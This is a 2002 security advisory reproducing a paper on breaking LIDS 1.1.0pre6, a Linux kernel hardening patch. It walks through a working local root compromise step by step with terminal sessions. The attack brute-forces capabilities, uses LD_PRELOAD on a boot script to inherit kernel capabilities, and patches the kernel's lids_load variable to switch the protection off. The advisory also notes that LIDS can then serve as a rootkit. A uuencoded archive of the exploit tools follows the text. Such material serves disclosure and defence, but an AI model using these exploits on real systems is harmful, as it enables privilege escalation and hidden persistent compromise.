15th Jan 2002 [SBWID-4997]
COMMAND
LIDS misconceptions leads to local root compromise
SYSTEMS AFFECTED
lids 1.1.0pre6-2.4.14
PROBLEM
In stealth <stealth@segfault.net> paper
[http://stealth.7350.org/lids-hack.tgz]:
--[ Introduction
LIDS was developed to protect systems from malicious root\'s which may
creep in via various system-holes such as bugs in wu-ftpd etc. In the
absence of \"real protection\" the LIDS developers felt that they need
to create some sort of sandbox in a way that evil attackers who gained
root access to the host may not be able to replace important
systemfiles such as /bin/login. They should also not be able to kill
important processes such as httpd or to modify the systemlogs.
I will show step by step that LIDS not even just fails to protect
the system from attackers but also is a securityhole in itself which
allows users to gain root-access in certain configurations. Further
LIDS may be abused as a rootkit for hiding files or processes.
--[ 1. How to determine you are LIDS\'ed
Lets assume that we already gained root on our testbox. This is not
very difficult as a lot of local root holes exist in almost all Linux
distributions. Choose one of the kernelbugs, crontab, modprobe or sperl
:-). LIDS will not hinder users to gain uid 0. LIDS was only designed
to put restrictions to user with uid 0 (root).
linux:~ # ls -la /proc/sys/lids/locks
-rw------- 1 root root 0 Dec 31 21:22 /proc/sys/lids/locks
linux:~ # touch /sbin/x
touch: creating `/sbin/x\': Operation not permitted
linux:~ #
Ok. This is easy. The system is LIDSed. Obviously the administrator put
a READONLY rule to /sbin directory.
Finding out which configuration the LIDS box has is already the hardest
part. We may do that with bruteforce. I wrote a tool called \"capscan\"
which tells you which restrictions apply to you.
--[ What did they do with root?
linux:~ # cd /tmp/lids/
linux:/tmp/lids # ./capscan -b
b 0 CAP_CHOWN
b 5 CAP_KILL
b 6 CAP_SETGID
b 7 CAP_SETUID
b 23 CAP_SYS_NICE
b 27 CAP_MKNOD
linux:/tmp/lids #
Aha. Capscan bruted the most important capabilities for us. We need to
brute-force (i.e. try chown(), try create_module(), try chroot(), ...)
because LIDS does not use the Linux kernel\'s capability-bits inside
the task-struct so we cant obtain it via capget().
To better understand which restrictions are placed on the system, we
will have a look at the configuration:
linux:~ # lidsconf -L
LIST
Subject ACCESS(inherit) time Object
-----------------------------------------------------
Any file READONLY(domain): 0 0000-0000 /etc
Any file READONLY(domain): 0 0000-0000 /sbin
Any file READONLY(domain): 0 0000-0000 /bin
Any file READONLY(domain): 0 0000-0000 /usr
Any file READONLY(domain): 0 0000-0000 /lib
Any file DENY(domain): 0 0000-0000 /etc/lids
Any file DENY(domain): 0 0000-0000 /etc/shadow
Any file APPEND(domain): 0 0000-0000 /var/log
/bin/login READONLY(domain): 0 0000-0000 /etc/shadow
/bin/su READONLY(domain): 0 0000-0000 /etc/shadow
/etc/init.d/halt GRANT(domain):1000 0000-0000 CAP_SYS_ADMIN
/etc/init.d/rc GRANT(domain):1000 0000-0000 CAP_SYS_ADMIN
/etc/init.d/rc GRANT(domain):1000 0000-0000 CAP_NET_ADMIN
/etc/init.d/halt GRANT(domain):1000 0000-0000 CAP_NET_ADMIN
/etc/init.d/halt GRANT(domain):1000 0000-0000 CAP_SYS_RAWIO
/etc/init.d/halt GRANT(domain):1000 0000-0000 CAP_INIT_KILL
/etc/init.d/rc GRANT(domain):1000 0000-0000 CAP_INIT_KILL
/bin/login GRANT(domain): 0 0000-0000 CAP_SYS_ADMIN
/bin/login GRANT(domain): 0 0000-0000 CAP_NET_ADMIN
Any file READONLY(domain): 0 0000-0000 /boot
The attacker is not able to issue the \"lidsconf -L\" command. This
command was issued from a LIDS free session, which root may be enter by
giving the correct password. Attacker does not know the password, so we
have to look for some other way. Almost all systems will have
CAP_SYS_ADMIN placed to the bootup and the shutdown scripts or
otherwise you won\'t be able to mount your disk etc. CAP_NET_ADMIN is
needed too to configure your network as well as CAP_SYS_RAWIO is needed
by some programs. I took this config more or less from the examples
shipped with LIDS. As you see, apropriate system directo- ries are
protected etc etc. For our reasons it does not matter which directories
we can modify or not, so do not get stuck at this. The inherit level
tells LIDS how much fork()\'s within the program are allowed and still
have the same capability granted. /etc/init.d/rc for example is a
shellscript and forks off a lot of commands such as \'ifconfig\' etc.
and thus it needs to have a certain inheritance level. Usually you\'d
use -1 (-1 means unlimited inheritance) here, but I never got it
working with -1 (bug?) and so I used 1000.
--[ Gimme your CAPs, please!
The following seems really trivial but LIDS is just leaking
capabilities bound to certain programs such as for /etc/initd/halt in
this example. \"x\" shellscript will create a shared object
/tmp/boom.so which forks a shell. Nothing special. When executing
/etc/init.d/halt script we preload this shared object and obtain the
shell from it. Lets go...
linux:/tmp/lids # ./x
OK
linux:/tmp/lids # LD_PRELOAD=/tmp/boom.so /etc/init.d/halt
linux:/tmp/lids # ./capscan -b
b 0 CAP_CHOWN
b 5 CAP_KILL
b 6 CAP_SETGID
b 7 CAP_SETUID
b 12 CAP_NET_ADMIN
b 17 CAP_SYS_RAWIO
b 21 CAP_SYS_ADMIN
b 23 CAP_SYS_NICE
b 27 CAP_MKNOD
linux:/tmp/lids #
We obtained CAP_SYS_ADMIN, CAP_SYS_RAWIO and CAP_NET_ADMIN from the
halt script. It could not be easier. This will also work with setuid
capability granted to xinetd for example. Users may gain root with the
help of LIDS!!! The inherit-level does not come to play here, even 0
would work fine for giving users a rootshell.
Let me conclude what happened until here: the capabilities such as
CAP_SYS_RAWIO are leaking (\"inherited\") to any subprocess if
apropriate inherit level was placed on the file. We may gain these
capabilities via preloading shared objects or by setting the $PATH
variable if the file is actually a shellscript. Even if the
inherit-level is 0, i.e. the capability is not inherited across fork()
the LD_PRELOAD trick still works. That is because preloading does not
create subprocesses and inside our preloaded library we may call
setuid(0) if CAP_SETUID was granted. The executed shell will then be a
rootshell.
LIDS however is still in kernel and protects /sbin and other
directories from tampering. So lets continue:
linux:/tmp/lids # cc lidsoff.c -o l
linux:/tmp/lids # grep lids /proc/ksyms
c02a2120 lids_load_Ra57ab5ad
c0120a10 lids_cap_log_R0d747633
c011e088 lids_cap_time_checker_R9f27daab
c02a2124 lids_local_on_R641824fe
c02a212c lids_local_pid_R2a2dd337
c011dfb0 lids_local_off_R445f75c1
linux:/tmp/lids # touch /sbin/x
touch: creating `/sbin/x\': Operation not permitted
linux:/tmp/lids # ls -la /etc/lids
ls: /etc/lids: No such file or directory
linux:/tmp/lids # ./l
Usage: ./l <addr-of-lids_local_on-in-hex>
linux:/data5/cvs-work/lids # ./l c02a2124
# Patching [c02a2120]
1 -> 0
disabled global LIDS protection
linux:/tmp/lids # ls -la /etc/lids
total 32
drwxr-xr-x 2 root root 4096 Dec 31 15:23 .
drwxr-xr-x 52 root root 8192 Dec 31 19:12 ..
-rw-r--r-- 1 root root 6760 Dec 30 21:11 lids.cap
-rw-r--r-- 1 root root 987 Dec 31 15:48 lids.conf
-rw-r--r-- 1 root root 970 Dec 30 21:11 lids.net
-rw-r--r-- 1 root root 40 Dec 30 21:23 lids.pw
linux:/tmp/lids # touch /sbin/x
linux:/tmp/lids # ./capscan -b
b 0 CAP_CHOWN
b 5 CAP_KILL
b 6 CAP_SETGID
b 7 CAP_SETUID
b 10 CAP_NET_BIND_SERVICE
b 12 CAP_NET_ADMIN
b 16 CAP_SYS_MODULE
b 17 CAP_SYS_RAWIO
b 18 CAP_SYS_CHROOT
b 19 CAP_SYS_PTRACE
b 21 CAP_SYS_ADMIN
b 23 CAP_SYS_NICE
b 27 CAP_MKNOD
linux:/tmp/lids #
\"lidsoff\" is just patching the \"lids_load\" variable in kernel to 0.
LIDS won\'t check any actions anymore then. This is possible because
/etc/init.d/halt was leaking the CAP_SYS_RAWIO capability to us.
Capscan shows that we got all important capabilities (capscan does not
try some capabilities such as CAP_SYS_REBOOT etc. :-) We are done! The
\"1 -> 0\" tells you that LIDS is disabled.
--[ Discussion
You may be surprised how easy it was to disable LIDS. There are other
ways to do it. One may hijack a LIDS free session by using a simple TTY
hijacker. Commands may easily be inserted into administrators terminal.
I don\'t like the idea of sandboxing root, there is too much that may
be overlooked and which is not fixable that easy. One thing is that
they still share the same homedir. Even though if you can make it
readonly, i don\'t feel comfortable with it. Rather I like systems with
ACL\'s which may be applied to files and a capability system where root
is still root but programs such as \"passwd\" or \"ssh\" don\'t have
setuid root but apropriate capabilities. SELinux is way more better
approach for this, even if I hope that .gov extensions will never make
it into the Linux kernel. Putting a portscan detector into the Linux
kernel is probably also a bad idea. As less code as possible in
critical parts of the system!
Once an attacker broke your LIDS system, he does not even need to
install a rootkit, LIDS is one. It allows for hiding files and
processes and once the attacker changed the LIDS password, the
administrator lost his machine.
--[ Links
[LIDS] http://www.lids.org
LIDS system, FAQs and documentation to LIDS.
I tried version lids-1.1.0pre6-2.4.14.
[capscan] http://stealth.7350.org/lids-hack.tgz
This paper with programs described inhere.
[SELinux] http://www.nsa.gov/selinux
SEcure Linux. One more toy to play with at home.
Expoit :
========
begin 644 lids-hack.zip
M4$L#!!0````(`)FS(BQKN@(C*`\\``*@G```+````87)T:6-L92YT>\'3%6O]/
MVT@6_WW^BFGNI(*$34*AM&AW[SA@=]&RT`-ZJU6UXB;V))[%\\42>,2&GU?WM
M]WEOQHX#J=1K>[JH!1R/W[SO[_/>6/SQ;=+_?/M!7BCGY7GEZR;7M3PU3HU+
MG<N;I?-Z)I-$7IR?WLC?UI_#DW^(/YY^][F?C;3`&CA0I2_D-_&/OSH]G:BF
M]&FE_7?R.5.!%CY)\\H%ELGF3>6,K?,5B+)23N7[0I9U#1F_EO+9>9UXZ%M?)
M26UG<J9*DQG;.%E;ZU\\ZN2A,5N#KI<AJK>?25/+!*/F@:EX5\'DX*6VI<-%B*
M;<;-U-\'\"19-,_#R7VF<I>)*^T$*-G:XR+>U$#FJ(UK(!3@>T(.B\\9;0&6[KT
MN*\'HAU[*2C/WQ(WR6CH[HQ^U)X).5?G8/M+6\"O(NPV/ZP912>:^R>Z*W**R<
M*E.!#(DH5)9IYT@AM\'MAX1*05E;6R[&6Y!%TK];S4H%M,YMC,U6U:IL8\"\"Y:
MP7?\'IMHM[=14J;PE;EUAFS*7JG3V*<5[4Y8K<@)J(#YZ6BP\\Z<[6M\'AF<S-9
M,H=A7VSB4B\'Q.9<+HH2=%N0U<SE>AM\\L/&N3=H9\"*_E[`^DFRI2NYP!B137X
MP$I7X\\8\'WHV#1IW.FMKX)1F;=&R\\T^4D>(A096D73C:.GO-!Q:S@)\"H8EYF&
MK/3;5A,S;6I%5G>I_+ZIP4/-S`I2/JL)I\'+2@V(R]P:<0QF%R4TUE:QW4DZG
MMS3Z_BB5/T(58\"\'77M<S6%HN;2-5\'7SKI<XI)+0\'9><:N`\\K:H$M2_A4ONQ[
MA[25M`U,H)V\'9Y%5H0K\\@TK%@ZZ7$G:9F`R!&5@M+7MB:3.X-E,(H:$?#51/
MCEG.R,6@+GEAJN91Y+A1&V@ZZ.*DL-8A/\"H.$3(-+%\'IDF)J1V:UK;P:[Y!#
M0\'+HR=;\"(4Y*>91LI\\\'<[`]D\\\\)4E-C6;=*87`[;E>#95N52Y-J9:17S`HQ>
M:V**HY*?)!*@BX3$C\\LM$FT;*B])AJ-_RS])^%12*KE+!MF%.^V6)L</F]T[
MD=2+F*/(8T=!,?3I_HB?H3S5F7PUDGNCH[V]S<166WI+H;+K*.H>!5\\=24X,
MY\"+_C#=>\'LDK:(B=C=4R)Z_P\'G[0D1+BZGYE7*W<D@.X#0M\\1_K2>2JOQ@^4
M^,H0C\"J\'?Y$!E8<A2\'-*7I\\=GUY=7OPJZR9$.O,!1ZD1;+9>0FO?PS#$HL4#
M(<&NA<0J#U(V*Q0SU7HG)=%\"U;`8)%&U3^4OFC-6;J,GDYG&=>,UXB73*64(
MBG2PYJTM!3R3JMP@4W.7*63=P(\'7)4Q(D1*NUUQ`S><DL:7[;:#]0IOE<`?.
MR]B=-R:+_@4KY,I,62YW_6P>;-C>Z+[!@G0W\\B*3L9!C>,\')\\;N[DQ^O?KFD
MRP.^_.G\\XH*N7O/5S=GM#^>G=\'W87K\\/UWNOPA>_WMQ=GI^<\\5=AS<\\_75Z=
M;M@?W!X7\"J$7F6#=L5B28W65\\\\&F&IO2>(.0IFS4.%9_6Y3XR835+K=,\"MU[
MI(@,J;G:VMX)%URW[A\"_\\([NRX+41E=IFFZ+L<X4(BZ60JLYW5`,!L<@_F-6
M0(\'N>%HF8V1DY!AG<EXIO\'+W\":S84)6WE.(RDL*..0LCH5(EQ_-3C;UAUEN+
MS(O`@%R4.!QDSC=Z`U(IE\\-<1F<-<;)#6U#V@8,^:,Z&]EZ&RKWNX4=KF0-6
MH+LRN0!4N;D5\\LGGIAG_3DA%RN.3D[.;FRU3H5P8O]TN\\`9I/\'ZN>*WX+#36
M[7Q<+;G$R\"Z:MW([@]:VCRA)R2$^\"?V0SSZ[0#M?@0XGC:_\"S]>BT[CZJ]`I
MS7@#\'?J<GEU^$AU2,<?N%]%A*JY0N5ULI\'/\\[MW9Y>DGR;4+.$RX3ZQ4\'F#@
M?Z.?3?P$4J[Y7#K\\-RJ43_/=`GT$+_CA^OCRMJ,SXJ>?$VJ3Z/\'IS^=(P[)/
MJL[^7X0NSVXCH2\\4[:L1(M&NCW\\YO_I20N>7Y[>QRGV9COJ$GKKC,T(?<:.G
M1OL2.BM5?WGZV!U3SX921>`K]BD1CW>=E0&L#Z5RT\"LM`U2@V0P5+>`\\$:\\8
M`_,3>>Q^0MF=H-M%Q^,<JM5.6P0)K<;^1%>HDP*]UM0\\$)0+):XFC`=8YMS\"
MUMCIN&6QJ^+W%34G6-PNVD%I%JB;7#+!/==,PA;<VEINC-#+IN)XU3FT+3LC
M?7YPS5YM<8X]+:FLF4L2EE\"!*QJ/W%!)E]5F[KF+XFT6QH56:6&KEVN]ZLPV
MP`U+ZH30KMQS0R_63,LV``KB72T]T]9[\'9ZKM(>T]]0E+8`T\\5NL14^/`#6P
M)#O`_[16,T<(UI-6/.\'S0!<LU=3\\2#173K#A2%3]J&9S\'D449DYS#L:D9%#8
M(J!;I_4.\\&QMY[7A\"4*`^!&>)Z(F;,<()[3\'FN<788;Q/:D*P@##.0)\"@%\"=
M86>*D5/HAENP3[0\"[&I;>%#`:C(Z069Z$.@+#7N31:1DT,F2=T>,`P$?=!G1
M.7LF-?HS:GS@)/=;VS2C@9`F`+&H,Q(@M.340\\/PSG>NPGA-S70/.4H\\`W^&
MPZXG\'D%^&\'4:9P`%,<*.PW2)!WC09++J?6-@A4&&@+U?FDDPVLN@Q>\"(#:N/
M3,X=9D2,[8@@2J]H5,0:2,5[UT\"B)1GQ9<YH.!G)+?R?:05;-%5IT-9!WMZS
MVQ)_PMXTR#C\'9FC9Q11L8F?R1@I<]A\"BA`[[+]M!61:+>?Q`:1;`6\'+#\\X.9
MS:(WPW71C4,KRND7,1U-+.F;2,+%$)PTW:*FJ4:\"4\"6SP/:#\'GD.@X>9@7Y3
M(<:(-`[<5A%M$\'1C(3))9Z58:-CXU+@&4Z5B\\#A8,Q4GBC@R(R/\"/8#=`ZKF
M3@@Y8I92C\\\")+EA5\"2:1RDM+_@6YYCJ#*&AY\"EUA,YTUW&D_*WSMKN2/NK0J
M%\\S>^KZDZ=B*L$O27B$%@Y#D`<W4HA\\2FUO&1R&O?MITZ^+T[MWUV<75\\>FW
M:Z(]Y?)_WHF.]IZ6/WQW^`0T4\'LZ>EIN/[.+12<:%`HEKU\'<6=^45;^>OKL,
MRIH)]D/>1<O+`\\PXNX2[&UW\'00G[%$\\\'.;%S\'#GM:4\"TRBPB9A9RZ4<PYCEE
M=(XJW_-LBFIJ-S`,E)@77<XIHU#8O\'CQHI\\6DY`6N^R;4<&@X54)4B\'F>>(Y
M!\',D`+,XH5D@MA>Q9H?!6)@O!E?GP:\"<<;>:E0WZZ`5-.0J%8D):11DT)=,_
M\"A6_/Q\"($?JDKE$I:4-]:Q#9U_E@F]A5`$*N&<<AIC237F42ZQ6`<,IZTTT(
MJIO^3&,<N2=,(?>(&(0<POT0Y-)/U19-?XMA_OSN^/9\'\'N]S\\3>3;BLD+J$R
M\'Y+P6B5(Y1GI.JY=MQ`<9;@CPRRDK[\"EB*BMTXA466V=BV4MC#JZ4*8TB@H9
MRA@9TY$7PC1@JAV7],1<^44\\)NAT3,6]RMLI\">7R^!B/`\\>UJI>4MTBE&4,M
M]NBMX3:)MXIO-D=7-6\\9>E`ZA!BL&,\'1X2E/$HY:=[%8Q:D:D7Z\"4#!?F.DP
M?Q%\\N#@\\Y%S)4+\"\'+\"+L021!@=4TE3=`CY0VX;RP9Z./-J;.+..)\"VIVFLD$
MCVQ:-*WUG)?%&>R]6\\[0;F?#/;4WVAORK3M2V]VU.CA4XP/D>-S%+36*=V%J
MK)C>70_SP_W#UZ]>\\8*1\'KYYLUI`DYN[K-`$DN^NWT[V#G.EQMU&^^U&L,6=
MK>ZN7^^/WNSM3W2W(NNOF!OP@Z_S_-6KP[!=/AD/UXA,)G?7^_L\'D\\.#;+1)
M\\O6ALOR,J?(&HNUP?#6X*-W1ZO(()3:D#PXTNS+S<G.5@LW>.S5%%L+?\\AN5
MYW5B)\\F:LA)3)85^_&[E!+GRZF`W>W`)15\"/6J=N@>MWRF=<[C^TUOY-R)%,
MOI-#0?`_\')).2SL&JF%?7AWAB4\\3WEN/9U_M21\"L%X]U0O^HO=O[R-\'`_O#M
MZ_9H8\'1PA.J8/GGTX&./OAF]W>L>?7N$H@Q((>E$HD[H\'ZWYV(G$Z\\/7\\41B
M2\"<2HQ%[4@K\'_50*\\NV;PQ[C^V\\B!>#A3R=QN(D)U-)/I@#]]2A`>TQAOO@$
M__]?8Z1A!T3^=GYYBCO7_XAX9R-\\>MTAF9^O3M]?G\'T,4XW>=-^=_\'A]=77+
M7[[MOGQW>WT<8=570E^#F%0\'\'<\"?MX\'4C2(X8PYZU;7+^<`\":#3\"H1QWWYP3
M&1^H=NI>+;GII:*R.JN:HV0:HA6KX/,I%%6J%H`0)^OPI-<$\\CD?^OIH73I1
M=MWA*\'5-JG]BO0XSMEJ?H,HK*!_2N0:W\\9LPTHJ)L[_!.*$O/$JV\"<(28,IM
MI5]P61V$S#/HG4^M#K8A?YN0VE.I4^.RAJ<V0OR*Q7%<XYH:J(I:.FJ?Z8\"/
M>T#%O6>D$><$MP3OF(MN^.*$YW:=&I.K*J\"#PORNR$+/QT4$J1I\'Z@9*,MP[
MW][^*L(#!)]/V@Z9Z!\"F+IE\'8!(T?=S`$C3L\'RV\"33[*1O,ESDD[\\)#2W(=F
M\'D!&]5Y_H(TI_\'?H9LU].XUD>&3`JJ.7.>CD&/\"#ADUQ0A`ZOPC*)N8QS\'[X
M!0H^#B6Y0QMH@E<(/O<+X(5AY6JR4,#NJ&`1%_K\"-M.\"\\!-9CV<A\"JP;.F96
M.9T_[P@3A9IH!`/`_(2<C#C@9@!Z%]>*K7$>Y%Y-P\'#[^.2B_Z8*(Z[YO#2A
M[0BO\"I\"(2O2\\/<Y]%JPC3I<=%.,KZM>?-=\\#GMKE`X$2/7\"N&$2V>7H1FY_N
MZ=Z0J1\\#P&EGX0P/V)7>4N&HC@=OX+NV*K3@W-/\'/@;*.X=:Y]$DZ=0^`\'%Z
M79\'#N8`V>;S1Z9:=Z.EY82K>-0\'K*TEQ\'$)6>\\8:FQ_A)%.CV(\\)]E.[I^08
M:(^\\CH=J-(&#R8\"F52\\=T6L>@/6&WH.@8VK7OLX0]/Z\"9\\%7--X!!]TD=US#
M\'\\.(A<.J/5<L]`K2LS[:$U?$C*>TU+TDLM-E!J00[F#CFRG/7AZ),\'O5%`A+
M[/C^9#DK5#6-9\\$!ZG13VV?\'_[*D\\2R-EF>*\\KX&S`@Y\">J\\=T)\\(`J_\\7L]
M1[N[B\\4BY3)LZZE8$_;[X[\\\'[G*;-3-=^?A2@`T)\"@D`S1\"8@K4YW1\"59)2.
MTB%:F=?)7KJ?CO:1#S_$G-QM&=\\E2P]?\'0QI6ZY=20%14S_]EQ1<4^9JWK[K
MT;E_KJG1&[>S-4W$HQ.OR5,Y19ZYZS072\'%SEM$`F!?&S,D5S\"Z[7ITWHA8;
M*8-RN/@/4$L#!!0````(`-J,(2S1.U.NB0H``&0;```%````8V%P+F.U66US
MFT@2_BS]BK:NXD@.D2WG9;.QDRN,D$U%$CI`<5Q[6RR&P:*,0`?(CF_C^^W7
M/0QHD.U<4EN7*LDP_?YT3T^/LK_7ACW0TM5=%ETM\"NAJ/3@\\.#@$NV!>7\"SZ
M1%;C&#@YAXSE++MA`:T3R6)!E!=9=+DNHC0!+PE@G3.($LC3=>8SOG(9)5YV
M!V&:+7,%;J-B`6G&_Z;K@K0LTR`*(]\\C\'0IX&8,5RY914;``5EEZ$P7X4\"R\\
M`K\\8ZHGC]#9*KL!/DR`BH9RTD-R2%>_I>=#?<BV\'-*Q\\\\M,`.==Y@>$4\'OI*
M6KW+](9(`@E2@O^2M(A\\IB!\'E$.,^DC-QBP/K^D3&O5C+UJRC&-W^-`1-\"@A
M4CF\"<09K=.[_XPN440I-0>JOERPIO\"II^YB/%.D9++V\"99$7YQO@><)(L1P&
M#^Y5G]>&%]RPK(AR,KF1)P/(2(LA\\XHUE@ZEG<H#_>9!Y&E8W&+:A%L<\"32R
MBKV[K4@\\_SI);V,67#\'2^UY(`#BDI\\2NP\"#]>!VPC6((V`V+TQ5&<7G7J.G7
M?11ED\'A+5JVC[W<$,EPR\\A+!3($E09J1QQD96:9%Y:LPF:.%+,(-`2&2FU%5
M%0[YBOE4WR@44>%G5-E)I8@J/<\\%I+3HG!DVV.;(.5<M\'?!Y9IF?C:$^A),+
M).J@SITSTX(__E!M)#]_#NITB)\\+$M:_S\"S=M@\'IQF0V-E`*U5CJU#%T6P%C
MJHWG0V-ZJL#)W(&IZ<#8F!@.LCFF0MI)R4-),$<PT2WM#%_5$V-L.!?<ZLAP
MIF1NA/94F*F68VCSL6K!;&[-3)MKHRB&AJV-56.B#_N`3J!AT#_K4P?L,W4\\
MEJ,ZT=$C]63,1;G:Z06*6[KFD/N;)PTA06?&\"M@S73/H0?^BH^>J=:%0_)HY
MM?5_S)$)B:1MJ$[44XRE^S]00+RUN:5/R#^,VYZ?V([AS!T=3DUS:),J5&_K
MUF=#T^TC&)LV!VANZPH:<51N\'K4@.DBFH.:VP7$RIHYN6?.98YC3\'BDZ,\\\\1
M\"\'161>DAQ]2<\\I@1$].Z(+V$!X=<@?,S\'=<M@A##<RR5L+`=R]`<TB9QHE7\'
MM!PI6)CJIV/C5)]J.E%-4G1NV\'H/,V38Q&\"4EL]57DKFG(=/N4\'?RD>I,A6>
M03!&H`X_&^2\\8,:\\VX:H$7-$FNRY=B;0IR+?;_]-[%0XSHL@2ON+CXVE#+=\\
M<VV=8.\\)FFNAGQ3QMF@01Y=;:W?Y?G&W8OG#Y3SUKUG17$]8$>%G/TJV^*.K
MQ(L?ZHA2?]L++AXVU^(H67_=QX-N\';,FA659DC[4NRHRSV>/^(Q=N[\':\\;U5
M?]%IM]E7;+T)-L$\";KVHZ-+#7N^HW::\'(KMS_45ZFW1[[3_;+7_A84?[[7?X
M`)W]8KG:#]/T\"__7.6JW2\"!3(`R0O+S.\"[9<=5<](H30Q=5C..BU6RT\\/==H
M\\``)?ISF#$EDKK6_1^;`@ROLC\"^]6VRKF\',N7+JP4N`*9:.@VWLQX,]7Y7.O
M5HV622^+<\\9?\\7U`NM<)(GE=>B/L9T?M^_8FREQHIC!IC>$;2J,1QM=)\"[F2
MBP5.?P&2[3JL=DMFDDP.\'IB\\:IB\\JDU>;9ND!4[_GLF*Z6F3UU$<EP81;4S;
M>\\C7(9XQ+/][#3;G07QMXY2:Q2/6GE\".XXF(!O<B\':RT4;P@R%P:[*)DJT3*
M;=2=C5QL<M2/3.V3BTU)5R<*6OQ>W2S9$N/M[J)29%50^;]9&G;QM4=R^+>/
M\'S?TEE%\\AZ;4TH9$6J59@81%@2-0]^W;MS78/(@P4!#V9A![O=*<;.O)NA-E
M)]5WL^PJR\'#/NYEWNZF!IY&QU/,2EAJ7CVBT!RC8L\",EIW7?EE!#LZV-8<QY
M:54P=/G*2RRN#Q^X&<JLZ`T^3V(!?H83&7/+=M3%&1(\'+]X2]DI8W$+N&X*-
M&^\'=2H#4U-+Q<%1B\'04&AZ]>D_\\!B]D#L@1@5^C:>\"EUJBQ-BPV8655#:7;=
M%8%QO,J>PIEY\'^O4F6RQK]@#>?55V2R7!KT23]XC=S,YH[#S0>!;>X(YC=*M
MK.(\\F:`YG\"WWK[&`,633M8;F=\'SQHSWRB7WG!<M(;M\"+WP8\'AZ]_W^R3A;Q)
M%GR+8)-9I\'E!@RR1&S31<VIZ9Y\'&W@[Z^^:Q7I!O:2JR&.,L-3WN+Q6]Y#,M
M4\\4?U7TC\"C/V+_KFC:W(_-5=%]_Z^\'\')C@*=..W46Z%+TD]MF^&I5?:3VG>0
MVR;)\\[.8*Z&F9VJGQF@T5D]Q[MU%BX]VV\\J;,/:N<MC]`/]!&7<^.WI<H_VS
M&K]]@(W\"[RNK2X0XG@:]\'`PVB/N+*,8N)SJ7`)(OXDJY8>0=D\\>,K;H#L3\'J
M/7)?\"@KE,YHL=5=U\'%4[4RH3!X3^]SMEBY\\Y@A_/G4_&>$SJ^6:;SLN7Q\\_M
M)=[PQ*DC#GDQF00\'G:J82Y[-.CKT]N#@F^T:(^W,4N#P^/C=8Z7]J,(FO&U1
ML@+5&R]>LR.Q#_>H5L6AU]U#9WMTIM]C.UWE?(9\"H3\\1G8ZFSEP-1_HI>E9/
M7/<*4@>\".E0UU\\2!W\\+;\"S(1))Q^*-\'QX!RZMJ[B=4MF>2581JA?MV3*ZXIB
MZXXQE\"EO!(7R(\'RB#\'\':6T%#H5,NM1EE./V7#7TNT]>\"_FY#G^%?V>RO@C0V
MIO,OKC&9S!VZTLDL@PHOW.\'N\"5[L7\'&A$H;H^\"X9!S*C9:I#3;6=AJI#B4,=
M3HP*_KH_E6RO)#8\\A\"4F[/(E2X6D,=/<,7:=AIDW$O%!#@8UG!>V.S&\'\\W$5
M27D`EDR_2$SH@F$*\'G[,E\"SO)!8L:M-TZF*B<ZYD^E5B*C>K8\"HW<%E2!S*3
MJFD-T`X\'$E4&;0/8X:\'$<E(Z4LKO[R^\\A0?O/Q+7*XEKNDD@C2&EFM=RT+IM
MSBVM6?MO)`;\'F#2),JZ.<^\'B*#LR3ALL%:J33U.S*E3>*DIRA>A85^V&[I>(
M0?<FC8*]WL%]^QZ[9QNG:3Y3>\"OO$J>6H(]/+@M#YA=XF5&@F6%^A>_WRTLM
M;\\9\"3CPK_#9&)T%C0D,*[$)W<\'S,2;U-(USAU;=PD4X\\[CIGF1MXA8<C6\\)N
M%=A>3..@/@<BT9!\'QEB\'O1\"?RIZY@Y+P[1OL<.:Z+;[D<VW(SXC-/%,4=PA0
MY_9%W7)WPH=\"W,NP&R)GHL.SKY`8_\'N&W_],.G0T`W123DHY*2U)2%0`R>C2
MRX\\2JOP]2A8LBPK\"3ZS4OP)CLEKH?D.&OS=D^$HM0U,%OQW-R%N8LMOG.?U4
MZ24^\"W#XK#3U>!N\'](9EI`\'2A.7\\\"H6B9ZKV::?\\C9%^<V5A`6B/0;!F].N@
M1_FZP1D84)A^PN._R\'HKWTNX!CQ]<83@>2G/BNCW/C]8:-!$+.\'%BTB:8T7M
M;(/3D.S![FZ)+^Q4`MO(-`7X,\"RGC,&S`)[E/!<-ULTKG7?E5-!N\"<D.\\E>W
M^\\<1Y;DH(G+I24S_`B*-5/\\8)M\\1>8!*]%.H<!BF*95I7M^WFXFCF:M9Q=N3
MXH\\BN_G/$([J7\\1QLZE^$,4G!1Y@N/JYR@K%C:AWU-JZWA((E]D:;X\\DU]WN
M<2+^\'PR=<]#0QA>W5VDZYNMU.BZ?C(*SE1!MQ].B\"9H^#V_J_P502P,$%```
M``@`VHPA+&1QB;K2`P``U0<```4```!C87`N:+5476_B.!1]YU=<J0_3CB(Z
MV]VGZ6BD$$RQ%!+6=MKAB3&)*=:&&\"4.\'?[]WFM`I:VTJWW82FW-_3CWG.-K
M;C\\/X#,D;G=H[?/&PW5R`W=?OMR!]$;7?C.D=%S7$-(=M*8S[=Y4%*>4,)7M
M?&M7O;>N`=U4T\'<&;`.=Z]O2A,C*-KH]P-JUVRZ\"%^LWX-KPW_6>4+:NLFM;
M:L*(0+<&=J;=6N]-!;O6[6V%![_1\'O\\8Q*EK]V*;9RA=4UEJZ@B%^K;&?Z7S
M;\\-WU#IPZS.GTE58V7<>Y7B-7`E5K]R>4B<G\"`1_&N=M:2*LL!W4B$<PKV.#
MO+><<&A9:[LU;?#N[B,1\'\'CAR)D(ZJQZ)/?_<(&CRA-2Y<I^:QJOSY=VB_?A
M,-_\"5GO36EUWK\\:\'\"R/@2QE!W._#L!NZVIO6VXY&OO;3`\"RDX-IHW^/JT+73
M>B#O(*)S:_^\"UW:B%9S`(;M:\']XIT>5?C7NI3?5L\"/?KJ0-`$<[1.X\\BR[JO
MS\"LP5&9O:K=#%:O#FYW^8XBM!AJ]-><X<C^0R;`RQ!+-=&\":RK7$N*4A6^?/
M7$\\C.YS06GP0L,;T6U7G#8=N9TK:;VRRM/@M;79S!J)-[[J3I1144RY!YA/U
M%`L&>)Z+_)&/V1A&\"TPRB`LUS07\\_!E+3\'_Z!\'$VQM\\%-;,?<\\&D!,SSV3SE
MV(4P(LX49S(\"GB5I,>;90P2C0D&6*TCYC\"LL4WE$Z`3RL1/R\"<R82*;X,1[Q
ME*M%F#KA*J-Q$YP7PSP6BB=%&@N8%V*>RX!&*L9<)FG,9VP\\!\"2!@X$]LDR!
MG,9I>JEJQ)!1/$I#:X#-%M@N6**(_NLI04N03!J!G+.$TX\']8,@\\%HN(]\"=Y
M)MF?!19ADM#&\\2Q^0\"W7_^(\"^IT4@LV(\'^J6Q4@JK@K%X\"\'/QY*@$%XR\\<@3
